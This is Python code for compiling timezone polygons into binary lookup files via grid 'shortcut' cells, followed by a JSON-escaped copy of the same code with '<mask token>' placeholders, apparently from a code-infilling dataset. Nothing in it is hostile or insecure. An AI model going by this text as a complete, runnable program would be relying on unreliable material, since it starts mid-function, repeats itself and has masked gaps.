end = floor(max_lng * NR_SHORTCUTS_PER_LNG) / NR_SHORTCUTS_PER_LNG
while current < end:
output_list.append(current)
current += step
output_list.append(end)
return output_list
def latitudes_to_check(max_lat, min_lat):
output_list = []
step = 1 / NR_SHORTCUTS_PER_LAT
current = ceil(min_lat * NR_SHORTCUTS_PER_LAT) / NR_SHORTCUTS_PER_LAT
end = floor(max_lat * NR_SHORTCUTS_PER_LAT) / NR_SHORTCUTS_PER_LAT
while current < end:
output_list.append(current)
current += step
output_list.append(end)
return output_list
def compute_x_intersection(y, x1, x2, y1, y2):
"""returns the x intersection from a horizontal line in y with the line from x1,y1 to x1,y2
"""
delta_y = y2 - y1
if delta_y == 0:
return x1
return ((y - y1) * (x2 - x1) / delta_y) + x1
def compute_y_intersection(x, x1, x2, y1, y2):
"""returns the y intersection from a vertical line in x with the line from x1,y1 to x1,y2
"""
delta_x = x2 - x1
if delta_x == 0:
return x1
return ((x - x1) * (y2 - y1) / delta_x) + y1
def x_intersections(y, x_coords, y_coords):
intersects = []
for i in range(len(y_coords) - 1):
iplus1 = i + 1
if y_coords[i] <= y:
# print('Y1<=y')
if y_coords[iplus1] > y:
# this was a crossing. compute the intersect
# print('Y2>y')
intersects.append(
compute_x_intersection(y, x_coords[i], x_coords[iplus1], y_coords[i], y_coords[iplus1]))
else:
# print('Y1>y')
if y_coords[iplus1] <= y:
# this was a crossing. compute the intersect
# print('Y2<=y')
intersects.append(compute_x_intersection(y, x_coords[i], x_coords[iplus1], y_coords[i],
y_coords[iplus1]))
return intersects
def y_intersections(x, x_coords, y_coords):
intersects = []
for i in range(len(y_coords) - 1):
iplus1 = i + 1
if x_coords[i] <= x:
if x_coords[iplus1] > x:
# this was a crossing. compute the intersect
intersects.append(
compute_y_intersection(x, x_coords[i], x_coords[iplus1], y_coords[i], y_coords[iplus1]))
else:
if x_coords[iplus1] <= x:
# this was a crossing. compute the intersect
intersects.append(compute_y_intersection(x, x_coords[i], x_coords[iplus1], y_coords[i],
y_coords[iplus1]))
return intersects
def compute_exact_shortcuts(xmax, xmin, ymax, ymin, line):
shortcuts_for_line = set()
        x_longs, y_longs = ints_of(line)
        # close the polygon: repeat the first point at the end
        y_longs.append(y_longs[0])
        x_longs.append(x_longs[0])
        step = 1 / NR_SHORTCUTS_PER_LAT
        # check all shortcut boundary latitudes crossed by the bounding box
for lat in latitudes_to_check(ymax, ymin):
intersects = sorted([int2coord(x) for x in
x_intersections(coord2int(lat), x_longs, y_longs)])
nr_of_intersects = len(intersects)
if nr_of_intersects % 2 != 0:
                raise ValueError('an uneven number of intersections has been encountered')
for i in range(0, nr_of_intersects, 2):
possible_longitudes = []
# collect all the zones between two intersections [in,out,in,out,...]
iplus = i + 1
intersection_in = intersects[i]
intersection_out = intersects[iplus]
if intersection_in == intersection_out:
# the polygon has a point exactly on the border of a shortcut zone here!
# only select the top shortcut if it is actually inside the polygon (point a little up is inside)
if contained(coord2int(intersection_in), coord2int(lat) + 1, x_longs,
y_longs):
shortcuts_for_line.add((x_shortcut(intersection_in), y_shortcut(lat) - 1))
# the bottom shortcut is always selected
shortcuts_for_line.add((x_shortcut(intersection_in), y_shortcut(lat)))
else:
# add all the shortcuts for the whole found area of intersection
possible_y_shortcut = y_shortcut(lat)
                    # both shortcuts should only be selected when the polygon doesn't stay on the border
middle = intersection_in + (intersection_out - intersection_in) / 2
if contained(coord2int(middle), coord2int(lat) + 1, x_longs,
y_longs):
while intersection_in < intersection_out:
possible_longitudes.append(intersection_in)
intersection_in += step
possible_longitudes.append(intersection_out)
# the shortcut above and below of the intersection should be selected!
possible_y_shortcut_min1 = possible_y_shortcut - 1
for possible_x_coord in possible_longitudes:
shortcuts_for_line.add((x_shortcut(possible_x_coord), possible_y_shortcut))
shortcuts_for_line.add((x_shortcut(possible_x_coord), possible_y_shortcut_min1))
else:
# polygon does not cross the border!
while intersection_in < intersection_out:
possible_longitudes.append(intersection_in)
intersection_in += step
possible_longitudes.append(intersection_out)
# only the shortcut above of the intersection should be selected!
for possible_x_coord in possible_longitudes:
shortcuts_for_line.add((x_shortcut(possible_x_coord), possible_y_shortcut))
        # same procedure for the longitudes (the vertical shortcut boundaries)
        step = 1 / NR_SHORTCUTS_PER_LAT
for lng in longitudes_to_check(xmax, xmin):
intersects = sorted([int2coord(y) for y in
y_intersections(coord2int(lng), x_longs, y_longs)])
nr_of_intersects = len(intersects)
if nr_of_intersects % 2 != 0:
                raise ValueError('an uneven number of intersections has been encountered')
possible_latitudes = []
for i in range(0, nr_of_intersects, 2):
# collect all the zones between two intersections [in,out,in,out,...]
iplus = i + 1
intersection_in = intersects[i]
intersection_out = intersects[iplus]
if intersection_in == intersection_out:
# the polygon has a point exactly on the border of a shortcut here!
# only select the left shortcut if it is actually inside the polygon (point a little left is inside)
if contained(coord2int(lng) - 1, coord2int(intersection_in), x_longs,
y_longs):
shortcuts_for_line.add((x_shortcut(lng) - 1, y_shortcut(intersection_in)))
# the right shortcut is always selected
shortcuts_for_line.add((x_shortcut(lng), y_shortcut(intersection_in)))
else:
# add all the shortcuts for the whole found area of intersection
possible_x_shortcut = x_shortcut(lng)
                    # both shortcuts should only be selected when the polygon doesn't stay on the border
middle = intersection_in + (intersection_out - intersection_in) / 2
if contained(coord2int(lng) - 1, coord2int(middle), x_longs,
y_longs):
while intersection_in < intersection_out:
possible_latitudes.append(intersection_in)
intersection_in += step
possible_latitudes.append(intersection_out)
# both shortcuts right and left of the intersection should be selected!
possible_x_shortcut_min1 = possible_x_shortcut - 1
for possible_latitude in possible_latitudes:
shortcuts_for_line.add((possible_x_shortcut, y_shortcut(possible_latitude)))
shortcuts_for_line.add((possible_x_shortcut_min1, y_shortcut(possible_latitude)))
else:
while intersection_in < intersection_out:
possible_latitudes.append(intersection_in)
intersection_in += step
# only the shortcut right of the intersection should be selected!
possible_latitudes.append(intersection_out)
for possible_latitude in possible_latitudes:
shortcuts_for_line.add((possible_x_shortcut, y_shortcut(possible_latitude)))
return shortcuts_for_line
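    # fills the global 'shortcuts' dict: (x, y) shortcut cell -> list of polygon nrs overlapping it.
    # small polygons simply occupy every cell of their bounding box, big zones get their exact cells computed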
def construct_shortcuts():
        print('building shortcuts...')
print('currently at polygon nr:')
line = 0
for xmax, xmin, ymax, ymin in all_boundaries:
if line % 100 == 0:
print(line)
column_nrs = included_shortcut_column_nrs(xmax, xmin)
row_nrs = included_shortcut_row_nrs(ymax, ymin)
if big_zone(xmax, xmin, ymax, ymin):
# This is a big zone! compute exact shortcuts with the whole polygon points
shortcuts_for_line = compute_exact_shortcuts(xmax, xmin, ymax, ymin, line)
min_x_shortcut = column_nrs[0]
max_x_shortcut = column_nrs[-1]
min_y_shortcut = row_nrs[0]
max_y_shortcut = row_nrs[-1]
shortcuts_to_remove = []
# remove shortcuts from outside the possible/valid area
for x, y in shortcuts_for_line:
if x < min_x_shortcut or x > max_x_shortcut or y < min_y_shortcut or y > max_y_shortcut:
shortcuts_to_remove.append((x, y))
for s in shortcuts_to_remove:
shortcuts_for_line.remove(s)
if len(shortcuts_for_line) > len(column_nrs) * len(row_nrs):
raise ValueError(
'there are more shortcuts than before now. there is something wrong with the algorithm!')
if len(shortcuts_for_line) < 3:
                    raise ValueError('algorithm not valid! less than 3 shortcut zones detected (should be at least 3)')
else:
shortcuts_for_line = []
for column_nr in column_nrs:
for row_nr in row_nrs:
shortcuts_for_line.append((column_nr, row_nr))
for shortcut in shortcuts_for_line:
shortcuts[shortcut] = shortcuts.get(shortcut, []) + [line]
line += 1
start_time = datetime.now()
construct_shortcuts()
end_time = datetime.now()
print('calculating the shortcuts took:', end_time - start_time, '\n')
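    # everything below serialises the collected data into little-endian binary files
    # (struct '<...' formats) which are read back by the lookup code at runtime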
# there are two floats per coordinate (lng, lat)
nr_of_floats = 2 * sum(all_lengths)
# write number of entries in shortcut field (x,y)
nr_of_entries_in_shortcut = []
shortcut_entries = []
amount_filled_shortcuts = 0
def sort_poly_shortcut(poly_nrs):
# TODO write test
        # the list of polygon ids in each shortcut is sorted by freq. of appearance of their zone id
# this is critical for ruling out zones faster
# (as soon as just polygons of one zone are left this zone can be returned)
# only around 5% of all shortcuts include polygons from more than one zone
        # in most of those cases there are only two different zones involved and one of them
# has only one entry (important to check the zone with one entry first!).
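        # e.g. polygon nrs [1, 2, 3] with zone ids [5, 5, 7] are returned as [3, 1, 2]:
        # the single polygon of zone 7 comes first, then the two polygons of zone 5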
polygon_ids = [poly_zone_ids[poly_nr] for poly_nr in poly_nrs]
id_freq = [polygon_ids.count(id) for id in polygon_ids]
zipped = list(zip(poly_nrs, polygon_ids, id_freq))
        # also make sure polygons with the same zone freq. are ordered by their zone id
# (polygons from different zones should not get mixed up)
sort = sorted((sorted(zipped, key=lambda x: x[1])), key=lambda x: x[2])
return [x[0] for x in sort] # take only the polygon nrs
# count how many shortcut addresses will be written:
# flatten out the shortcuts in one list in the order they are going to be written inside the polygon file
for x in range(360 * NR_SHORTCUTS_PER_LNG):
for y in range(180 * NR_SHORTCUTS_PER_LAT):
try:
shortcuts_this_entry = shortcuts[(x, y)]
shortcut_entries.append(sort_poly_shortcut(shortcuts_this_entry))
amount_filled_shortcuts += 1
nr_of_entries_in_shortcut.append(len(shortcuts_this_entry))
except KeyError:
nr_of_entries_in_shortcut.append(0)
amount_of_shortcuts = len(nr_of_entries_in_shortcut)
print_shortcut_statistics()
if amount_of_shortcuts != 360 * 180 * NR_SHORTCUTS_PER_LNG * NR_SHORTCUTS_PER_LAT:
print(amount_of_shortcuts)
raise ValueError('this number of shortcut zones is wrong')
print('The number of filled shortcut zones are:', amount_filled_shortcuts, '(=',
round((amount_filled_shortcuts / amount_of_shortcuts) * 100, 2), '% of all shortcuts)')
# for every shortcut <H and <I is written (nr of entries and address)
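    # ('<H' = little-endian unsigned short, NR_BYTES_H bytes; '<I' = little-endian unsigned int, NR_BYTES_I bytes)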
shortcut_space = 360 * NR_SHORTCUTS_PER_LNG * 180 * NR_SHORTCUTS_PER_LAT * (NR_BYTES_H + NR_BYTES_I)
for nr in nr_of_entries_in_shortcut:
        # every line in every shortcut takes up 2 bytes
shortcut_space += NR_BYTES_H * nr
print('The number of polygons is:', nr_of_lines)
print('The number of floats in all the polygons is (2 per point):', nr_of_floats)
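    # [POLYGON AREA]
    # write which polygon nr starts each zone, the zone id of every polygon, the bounding boxes,
    # the coordinate data itself and the per-polygon addresses and coordinate amounts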
path = 'poly_nr2zone_id.bin'
print('writing file', path)
output_file = open(path, 'wb')
for zone_id in poly_nr2zone_id:
output_file.write(pack(b'<H', zone_id))
output_file.close()
print('Done\n')
# write zone_ids
path = 'poly_zone_ids.bin'
print('writing file "', path, '"')
output_file = open(path, 'wb')
for zone_id in poly_zone_ids:
output_file.write(pack(b'<H', zone_id))
output_file.close()
# write boundary_data
path = 'poly_max_values.bin'
print('writing file "', path, '"')
output_file = open(path, 'wb')
for xmax, xmin, ymax, ymin in all_boundaries:
output_file.write(pack(b'<iiii', coord2int(xmax), coord2int(xmin), coord2int(ymax), coord2int(ymin)))
output_file.close()
# write polygon_data, addresses and number of values
path = 'poly_data.bin'
print('writing file "', path, '"')
output_file = open(path, 'wb')
addresses = []
i = 0
for x_coords, y_coords in all_coords:
addresses.append(output_file.tell())
if all_lengths[i] != len(x_coords):
raise ValueError('x_coords do not have the expected length!', all_lengths[i], len(x_coords))
for x in x_coords:
output_file.write(pack(b'<i', coord2int(x)))
for y in y_coords:
output_file.write(pack(b'<i', coord2int(y)))
i += 1
output_file.close()
path = 'poly_adr2data.bin'
print('writing file "', path, '"')
output_file = open(path, 'wb')
for adr in addresses:
output_file.write(pack(b'<I', adr))
output_file.close()
path = 'poly_coord_amount.bin'
print('writing file "', path, '"')
output_file = open(path, 'wb')
for length in all_lengths:
output_file.write(pack(b'<I', length))
output_file.close()
# [SHORTCUT AREA]
# write all nr of entries
path = 'shortcuts_entry_amount.bin'
print('writing file "', path, '"')
output_file = open(path, 'wb')
for nr in nr_of_entries_in_shortcut:
if nr > 300:
raise ValueError("There are too many polygons in this shortcut:", nr)
output_file.write(pack(b'<H', nr))
output_file.close()
# write Address of first Polygon_nr in shortcut field (x,y)
# Attention: 0 is written when no entries are in this shortcut
adr = 0
path = 'shortcuts_adr2data.bin'
print('writing file "', path, '"')
output_file = open(path, 'wb')
for nr in nr_of_entries_in_shortcut:
if nr == 0:
output_file.write(pack(b'<I', 0))
else:
output_file.write(pack(b'<I', adr))
# each line_nr takes up 2 bytes of space
adr += 2 * nr
output_file.close()
# write Line_Nrs for every shortcut
path = 'shortcuts_data.bin'
print('writing file "', path, '"')
output_file = open(path, 'wb')
for entries in shortcut_entries:
for entry in entries:
if entry > nr_of_lines:
raise ValueError(entry)
output_file.write(pack(b'<H', entry))
output_file.close()
# write corresponding zone id for every shortcut (iff unique)
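    # a valid id means all polygons in that shortcut belong to one single zone; shortcuts that are
    # empty or span several zones get INVALID_ZONE_ID written instead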
path = 'shortcuts_unique_id.bin'
print('writing file "', path, '"')
output_file = open(path, 'wb')
if poly_zone_ids[-1] >= INVALID_ZONE_ID:
raise ValueError(
            'There are too many zones for this data type (H). The shortcuts_unique_id file needs an invalid id!')
for x in range(360 * NR_SHORTCUTS_PER_LNG):
for y in range(180 * NR_SHORTCUTS_PER_LAT):
try:
shortcuts_this_entry = shortcuts[(x, y)]
unique_id = poly_zone_ids[shortcuts_this_entry[0]]
for nr in shortcuts_this_entry:
if poly_zone_ids[nr] != unique_id:
# there is a polygon from a different zone (hence an invalid id should be written)
unique_id = INVALID_ZONE_ID
break
output_file.write(pack(b'<H', unique_id))
except KeyError:
# also write an Invalid Id when there is no polygon at all
output_file.write(pack(b'<H', INVALID_ZONE_ID))
output_file.close()
# [HOLE AREA, Y = number of holes (very few: around 22)]
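    # holes are stored like the polygons: the polygon nr they belong to, their coordinate amount,
    # the address of their data and finally the int32 x/y coordinate data itself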
hole_space = 0
# '<H' for every hole store the related line
path = 'hole_poly_ids.bin'
print('writing file "', path, '"')
output_file = open(path, 'wb')
i = 0
for line in polynrs_of_holes:
if line > nr_of_lines:
raise ValueError(line, nr_of_lines)
output_file.write(pack(b'<H', line))
i += 1
hole_space += output_file.tell()
output_file.close()
if i > amount_of_holes:
raise ValueError('There are more related lines than holes.')
# '<H' Y times [H unsigned short: nr of values (coordinate PAIRS! x,y in int32 int32) in this hole]
path = 'hole_coord_amount.bin'
print('writing file "', path, '"')
output_file = open(path, 'wb')
for length in all_hole_lengths:
output_file.write(pack(b'<H', length))
hole_space += output_file.tell()
output_file.close()
# '<I' Y times [ I unsigned int: absolute address of the byte where the data of that hole starts]
adr = 0
path = 'hole_adr2data.bin'
print('writing file "', path, '"')
output_file = open(path, 'wb')
for length in all_hole_lengths:
output_file.write(pack(b'<I', adr))
# each pair of points takes up 8 bytes of space
adr += 2 * NR_BYTES_I * length
hole_space += output_file.tell()
output_file.close()
# Y times [ 2x i signed ints for every hole: x coords, y coords ]
# write hole polygon_data
path = 'hole_data.bin'
print('writing file "', path, '"')
output_file = open(path, 'wb')
for x_coords, y_coords in all_holes:
for x in x_coords:
output_file.write(pack(b'<i', coord2int(x)))
for y in y_coords:
output_file.write(pack(b'<i', coord2int(y)))
hole_space += output_file.tell()
output_file.close()
polygon_space = nr_of_floats * NR_BYTES_I
total_space = polygon_space + hole_space + shortcut_space
print('the polygon data makes up', percent(polygon_space, total_space), '% of the data')
print('the shortcuts make up', percent(shortcut_space, total_space), '% of the data')
print('holes make up', percent(hole_space, total_space), '% of the data')
print('Success!')
return
if __name__ == '__main__':
# parsing the data from the .json into RAM
parse_polygons_from_json(path=INPUT_JSON_FILE_NAME)
# update all the zone names and set the right ids to be written in the poly_zone_ids.bin
# sort data according to zone_id
update_zone_names(path=TIMEZONE_NAMES_FILE)
    # IMPORTANT: load the newly updated timezone names (JSON)!
# the compilation process needs the new version of the timezone names
with open(abspath(join(__file__, pardir, TIMEZONE_NAMES_FILE)), 'r') as f:
timezone_names = json.loads(f.read())
# compute shortcuts and write everything into the binaries
compile_binaries()
coord2int(lng), x_longs, y_longs)])\n nr_of_intersects = len(intersects)\n if nr_of_intersects % 2 != 0:\n raise ValueError(\n 'an uneven number of intersections has been accounted')\n possible_latitudes = []\n for i in range(0, nr_of_intersects, 2):\n iplus = i + 1\n intersection_in = intersects[i]\n intersection_out = intersects[iplus]\n if intersection_in == intersection_out:\n if contained(coord2int(lng) - 1, coord2int(\n intersection_in), x_longs, y_longs):\n shortcuts_for_line.add((x_shortcut(lng) - 1,\n y_shortcut(intersection_in)))\n shortcuts_for_line.add((x_shortcut(lng), y_shortcut(\n intersection_in)))\n else:\n possible_x_shortcut = x_shortcut(lng)\n middle = intersection_in + (intersection_out -\n intersection_in) / 2\n if contained(coord2int(lng) - 1, coord2int(middle),\n x_longs, y_longs):\n while intersection_in < intersection_out:\n possible_latitudes.append(intersection_in)\n intersection_in += step\n possible_latitudes.append(intersection_out)\n possible_x_shortcut_min1 = possible_x_shortcut - 1\n for possible_latitude in possible_latitudes:\n shortcuts_for_line.add((possible_x_shortcut,\n y_shortcut(possible_latitude)))\n shortcuts_for_line.add((\n possible_x_shortcut_min1, y_shortcut(\n possible_latitude)))\n else:\n while intersection_in < intersection_out:\n possible_latitudes.append(intersection_in)\n intersection_in += step\n possible_latitudes.append(intersection_out)\n for possible_latitude in possible_latitudes:\n shortcuts_for_line.add((possible_x_shortcut,\n y_shortcut(possible_latitude)))\n return shortcuts_for_line\n\n def construct_shortcuts():\n print('building shortucts...')\n print('currently at polygon nr:')\n line = 0\n for xmax, xmin, ymax, ymin in all_boundaries:\n if line % 100 == 0:\n print(line)\n column_nrs = included_shortcut_column_nrs(xmax, xmin)\n row_nrs = included_shortcut_row_nrs(ymax, ymin)\n if big_zone(xmax, xmin, ymax, ymin):\n shortcuts_for_line = compute_exact_shortcuts(xmax, xmin,\n ymax, ymin, line)\n min_x_shortcut = column_nrs[0]\n max_x_shortcut = column_nrs[-1]\n min_y_shortcut = row_nrs[0]\n max_y_shortcut = row_nrs[-1]\n shortcuts_to_remove = []\n for x, y in shortcuts_for_line:\n if (x < min_x_shortcut or x > max_x_shortcut or y <\n min_y_shortcut or y > max_y_shortcut):\n shortcuts_to_remove.append((x, y))\n for s in shortcuts_to_remove:\n shortcuts_for_line.remove(s)\n if len(shortcuts_for_line) > len(column_nrs) * len(row_nrs):\n raise ValueError(\n 'there are more shortcuts than before now. there is something wrong with the algorithm!'\n )\n if len(shortcuts_for_line) < 3:\n raise ValueError(\n 'algorithm not valid! 
less than 3 zones detected (should be at least 3)'\n )\n else:\n shortcuts_for_line = []\n for column_nr in column_nrs:\n for row_nr in row_nrs:\n shortcuts_for_line.append((column_nr, row_nr))\n for shortcut in shortcuts_for_line:\n shortcuts[shortcut] = shortcuts.get(shortcut, []) + [line]\n line += 1\n start_time = datetime.now()\n construct_shortcuts()\n end_time = datetime.now()\n print('calculating the shortcuts took:', end_time - start_time, '\\n')\n nr_of_floats = 2 * sum(all_lengths)\n nr_of_entries_in_shortcut = []\n shortcut_entries = []\n amount_filled_shortcuts = 0\n\n def sort_poly_shortcut(poly_nrs):\n polygon_ids = [poly_zone_ids[poly_nr] for poly_nr in poly_nrs]\n id_freq = [polygon_ids.count(id) for id in polygon_ids]\n zipped = list(zip(poly_nrs, polygon_ids, id_freq))\n sort = sorted(sorted(zipped, key=lambda x: x[1]), key=lambda x: x[2])\n return [x[0] for x in sort]\n for x in range(360 * NR_SHORTCUTS_PER_LNG):\n for y in range(180 * NR_SHORTCUTS_PER_LAT):\n try:\n shortcuts_this_entry = shortcuts[x, y]\n shortcut_entries.append(sort_poly_shortcut(\n shortcuts_this_entry))\n amount_filled_shortcuts += 1\n nr_of_entries_in_shortcut.append(len(shortcuts_this_entry))\n except KeyError:\n nr_of_entries_in_shortcut.append(0)\n amount_of_shortcuts = len(nr_of_entries_in_shortcut)\n print_shortcut_statistics()\n if (amount_of_shortcuts != 360 * 180 * NR_SHORTCUTS_PER_LNG *\n NR_SHORTCUTS_PER_LAT):\n print(amount_of_shortcuts)\n raise ValueError('this number of shortcut zones is wrong')\n print('The number of filled shortcut zones are:',\n amount_filled_shortcuts, '(=', round(amount_filled_shortcuts /\n amount_of_shortcuts * 100, 2), '% of all shortcuts)')\n shortcut_space = (360 * NR_SHORTCUTS_PER_LNG * 180 *\n NR_SHORTCUTS_PER_LAT * (NR_BYTES_H + NR_BYTES_I))\n for nr in nr_of_entries_in_shortcut:\n shortcut_space += NR_BYTES_H * nr\n print('The number of polygons is:', nr_of_lines)\n print('The number of floats in all the polygons is (2 per point):',\n nr_of_floats)\n path = 'poly_nr2zone_id.bin'\n print('writing file', path)\n output_file = open(path, 'wb')\n for zone_id in poly_nr2zone_id:\n output_file.write(pack(b'<H', zone_id))\n output_file.close()\n print('Done\\n')\n path = 'poly_zone_ids.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for zone_id in poly_zone_ids:\n output_file.write(pack(b'<H', zone_id))\n output_file.close()\n path = 'poly_max_values.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for xmax, xmin, ymax, ymin in all_boundaries:\n output_file.write(pack(b'<iiii', coord2int(xmax), coord2int(xmin),\n coord2int(ymax), coord2int(ymin)))\n output_file.close()\n path = 'poly_data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n addresses = []\n i = 0\n for x_coords, y_coords in all_coords:\n addresses.append(output_file.tell())\n if all_lengths[i] != len(x_coords):\n raise ValueError('x_coords do not have the expected length!',\n all_lengths[i], len(x_coords))\n for x in x_coords:\n output_file.write(pack(b'<i', coord2int(x)))\n for y in y_coords:\n output_file.write(pack(b'<i', coord2int(y)))\n i += 1\n output_file.close()\n path = 'poly_adr2data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for adr in addresses:\n output_file.write(pack(b'<I', adr))\n output_file.close()\n path = 'poly_coord_amount.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for length in all_lengths:\n 
output_file.write(pack(b'<I', length))\n output_file.close()\n path = 'shortcuts_entry_amount.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for nr in nr_of_entries_in_shortcut:\n if nr > 300:\n raise ValueError('There are too many polygons in this shortcut:',\n nr)\n output_file.write(pack(b'<H', nr))\n output_file.close()\n adr = 0\n path = 'shortcuts_adr2data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for nr in nr_of_entries_in_shortcut:\n if nr == 0:\n output_file.write(pack(b'<I', 0))\n else:\n output_file.write(pack(b'<I', adr))\n adr += 2 * nr\n output_file.close()\n path = 'shortcuts_data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for entries in shortcut_entries:\n for entry in entries:\n if entry > nr_of_lines:\n raise ValueError(entry)\n output_file.write(pack(b'<H', entry))\n output_file.close()\n path = 'shortcuts_unique_id.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n if poly_zone_ids[-1] >= INVALID_ZONE_ID:\n raise ValueError(\n 'There are too many zones for this data type (H). The shortcuts_unique_id file need a Invalid Id!'\n )\n for x in range(360 * NR_SHORTCUTS_PER_LNG):\n for y in range(180 * NR_SHORTCUTS_PER_LAT):\n try:\n shortcuts_this_entry = shortcuts[x, y]\n unique_id = poly_zone_ids[shortcuts_this_entry[0]]\n for nr in shortcuts_this_entry:\n if poly_zone_ids[nr] != unique_id:\n unique_id = INVALID_ZONE_ID\n break\n output_file.write(pack(b'<H', unique_id))\n except KeyError:\n output_file.write(pack(b'<H', INVALID_ZONE_ID))\n output_file.close()\n hole_space = 0\n path = 'hole_poly_ids.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n i = 0\n for line in polynrs_of_holes:\n if line > nr_of_lines:\n raise ValueError(line, nr_of_lines)\n output_file.write(pack(b'<H', line))\n i += 1\n hole_space += output_file.tell()\n output_file.close()\n if i > amount_of_holes:\n raise ValueError('There are more related lines than holes.')\n path = 'hole_coord_amount.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for length in all_hole_lengths:\n output_file.write(pack(b'<H', length))\n hole_space += output_file.tell()\n output_file.close()\n adr = 0\n path = 'hole_adr2data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for length in all_hole_lengths:\n output_file.write(pack(b'<I', adr))\n adr += 2 * NR_BYTES_I * length\n hole_space += output_file.tell()\n output_file.close()\n path = 'hole_data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for x_coords, y_coords in all_holes:\n for x in x_coords:\n output_file.write(pack(b'<i', coord2int(x)))\n for y in y_coords:\n output_file.write(pack(b'<i', coord2int(y)))\n hole_space += output_file.tell()\n output_file.close()\n polygon_space = nr_of_floats * NR_BYTES_I\n total_space = polygon_space + hole_space + shortcut_space\n print('the polygon data makes up', percent(polygon_space, total_space),\n '% of the data')\n print('the shortcuts make up', percent(shortcut_space, total_space),\n '% of the data')\n print('holes make up', percent(hole_space, total_space), '% of the data')\n print('Success!')\n return\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef x_shortcut(lng):\n return floor((lng + 180) * NR_SHORTCUTS_PER_LNG)\n\n\ndef y_shortcut(lat):\n return floor((90 - lat) * NR_SHORTCUTS_PER_LAT)\n\n\ndef big_zone(xmax, xmin, ymax, ymin):\n return (xmax - xmin > 2 / NR_SHORTCUTS_PER_LNG and ymax - ymin > 2 /\n NR_SHORTCUTS_PER_LAT)\n\n\ndef percent(numerator, denominator):\n return round(numerator / denominator * 100, 2)\n\n\ndef accumulated_frequency(int_list):\n out = []\n total = sum(int_list)\n acc = 0\n for e in int_list:\n acc += e\n out.append(percent(acc, total))\n return out\n\n\ndef ints_of(line=0):\n x_coords, y_coords = all_coords[line]\n return [coord2int(x) for x in x_coords], [coord2int(x) for x in y_coords]\n\n\ndef contained(x, y, x_coords, y_coords):\n return inside_polygon(x, y, [x_coords, y_coords])\n\n\ndef unique(iterable):\n out = []\n for i in iterable:\n if i not in out:\n out.append(i)\n return out\n\n\ndef point_between(p1, p2):\n return p1[0] + (p2[0] - p1[0]) / 2, p1[1] + (p2[1] - p1[1]) / 2\n\n\ndef get_shortcuts(x, y):\n result = shortcuts.get((x, y))\n if result is None:\n return []\n else:\n return result\n\n\n<mask token>\n\n\ndef not_empty(iterable):\n for i in iterable:\n return True\n return False\n\n\ndef polys_of_one_zone():\n for i in range(len(timezone_names)):\n start = poly_nr2zone_id[i]\n end = poly_nr2zone_id[i + 1]\n yield list(range(start, end))\n\n\ndef replace_entry(iterable, entry, substitute):\n for i in range(len(iterable)):\n if iterable[i] == entry:\n iterable[i] = substitute\n return iterable\n\n\ndef _holes_in_poly(poly_nr):\n i = 0\n for nr in polynrs_of_holes:\n if nr == poly_nr:\n yield all_holes[i]\n i += 1\n\n\ndef parse_polygons_from_json(path=INPUT_JSON_FILE_NAME):\n global amount_of_holes\n global nr_of_lines\n global poly_zone_ids\n print('Parsing data from {}\\nthis could take a while...\\n'.format(path))\n tz_list = json.loads(open(path).read()).get('features')\n polygon_counter = 0\n current_zone_id = 0\n print('holes found at: (poly_nr zone_name)')\n for tz_dict in tz_list:\n if DEBUG and polygon_counter > DEBUG_POLY_STOP:\n break\n tz_name = tz_dict.get('properties').get('tzid')\n all_tz_names.append(tz_name)\n geometry = tz_dict.get('geometry')\n if geometry.get('type') == 'MultiPolygon':\n multipolygon = geometry.get('coordinates')\n else:\n multipolygon = [geometry.get('coordinates')]\n for poly_with_hole in multipolygon:\n x_coords, y_coords = list(zip(*poly_with_hole.pop(0)))\n x_coords = list(x_coords)\n y_coords = list(y_coords)\n x_coords.pop(-1)\n y_coords.pop(-1)\n all_coords.append((x_coords, y_coords))\n all_lengths.append(len(x_coords))\n all_boundaries.append((max(x_coords), min(x_coords), max(\n y_coords), min(y_coords)))\n poly_zone_ids.append(current_zone_id)\n for hole in poly_with_hole:\n print(polygon_counter, tz_name)\n amount_of_holes += 1\n polynrs_of_holes.append(polygon_counter)\n x_coords, y_coords = list(zip(*hole))\n x_coords = list(x_coords)\n y_coords = list(y_coords)\n x_coords.pop(-1)\n y_coords.pop(-1)\n all_holes.append((x_coords, y_coords))\n all_hole_lengths.append(len(x_coords))\n polygon_counter += 1\n current_zone_id += 1\n if max(all_lengths) >= 2 ** (8 * NR_BYTES_I):\n raise ValueError(\n 'amount of coords cannot be represented by int32 in poly_coord_amount.bin:'\n , max(all_lengths))\n if max(all_hole_lengths) >= 2 ** (8 * NR_BYTES_H):\n raise ValueError(\n 'amount of coords cannot be represented by short (int16) in hole_coord_amount.bin:'\n , max(all_hole_lengths))\n nr_of_lines = 
len(all_lengths)\n if polygon_counter != nr_of_lines:\n raise ValueError(\n 'polygon counter and entry number in all_length is different:',\n polygon_counter, nr_of_lines)\n if nr_of_lines >= 2 ** (8 * NR_BYTES_H):\n raise ValueError(\n 'polygon id cannot be encoded as short (int16) in hole_coord_amount.bin! there are'\n , nr_of_lines, 'polygons')\n if poly_zone_ids[-1] > 2 ** (8 * NR_BYTES_H):\n raise ValueError(\n 'zone id cannot be encoded as char (int8). the last id is',\n poly_zone_ids[-1])\n if 0 in all_lengths:\n raise ValueError()\n print('... parsing done.')\n print('maximal amount of coordinates in one polygon:', max(all_lengths))\n print('amount_of_holes:', amount_of_holes)\n print('amount of polygons:', nr_of_lines)\n print('\\n')\n\n\ndef update_zone_names(path=TIMEZONE_NAMES_FILE):\n global poly_zone_ids\n global list_of_pointers\n global all_boundaries\n global all_coords\n global all_lengths\n global polynrs_of_holes\n print('updating the zone names in {} now...'.format(path))\n with open(abspath(path), 'w') as f:\n f.write(json.dumps(all_tz_names))\n 